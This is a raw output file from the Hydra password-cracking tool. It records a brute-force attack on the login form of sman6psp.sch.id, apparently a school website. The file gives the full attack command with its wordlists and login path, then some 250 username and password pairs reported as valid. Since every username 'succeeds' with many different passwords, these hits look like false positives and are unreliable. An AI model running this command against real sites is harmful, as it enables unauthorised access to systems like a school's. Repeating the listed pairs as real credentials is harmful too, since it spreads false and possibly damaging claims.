# Hydra v9.5 run at 2025-08-24 05:35:13 on sman6psp.sch.id http-post-form (hydra -L /Users/mac/SecLists/Usernames/top-usernames-shortlist.txt -P /Users/mac/SecLists/Passwords/Common-Credentials/10k-most-common.txt -o /Users/mac/hydra_results.txt sman6psp.sch.id http-post-form /auth/login:email=^USER^&password=^PASS^:Invalid)
[443][http-post-form] host: sman6psp.sch.id   login: root   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: root   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: root   password: password
[443][http-post-form] host: sman6psp.sch.id   login: root   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: root   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: root   password: michael
[443][http-post-form] host: sman6psp.sch.id   login: root   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: admin   password: password
[443][http-post-form] host: sman6psp.sch.id   login: admin   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: admin   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: admin   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: admin   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: admin   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: admin   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: root   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: root   password: football
[443][http-post-form] host: sman6psp.sch.id   login: root   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: root   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: root   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: root   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: root   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: root   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: root   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: test   password: password
[443][http-post-form] host: sman6psp.sch.id   login: test   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: test   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: test   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: test   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: test   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: test   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: test   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: test   password: football
[443][http-post-form] host: sman6psp.sch.id   login: test   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: test   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: test   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: test   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: test   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: test   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: test   password: michael
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: password
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: football
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: guest   password: michael
[443][http-post-form] host: sman6psp.sch.id   login: info   password: password
[443][http-post-form] host: sman6psp.sch.id   login: info   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: info   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: info   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: info   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: info   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: info   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: info   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: info   password: football
[443][http-post-form] host: sman6psp.sch.id   login: info   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: info   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: info   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: info   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: info   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: password
[443][http-post-form] host: sman6psp.sch.id   login: info   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: football
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: password
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: adm   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: football
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: mysql   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: user   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: user   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: user   password: password
[443][http-post-form] host: sman6psp.sch.id   login: user   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: user   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: user   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: user   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: user   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: user   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: user   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: user   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: user   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: user   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: user   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: user   password: michael
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: password
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: user   password: football
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: password
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: football
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: administrator   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: password
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: football
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: password
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: oracle   password: football
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: ftp   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: football
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: pi   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: password
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: football
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: password
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: football
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: password
[443][http-post-form] host: sman6psp.sch.id   login: puppet   password: michael
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: ansible   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: football
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: ec2-user   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: password
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: football
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: abc123
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: password
[443][http-post-form] host: sman6psp.sch.id   login: vagrant   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: 123456
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: 12345678
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: 12345
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: qwerty
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: 1234
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: dragon
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: baseball
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: pussy
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: football
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: letmein
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: monkey
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: 696969
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: mustang
[443][http-post-form] host: sman6psp.sch.id   login: azureuser   password: abc123
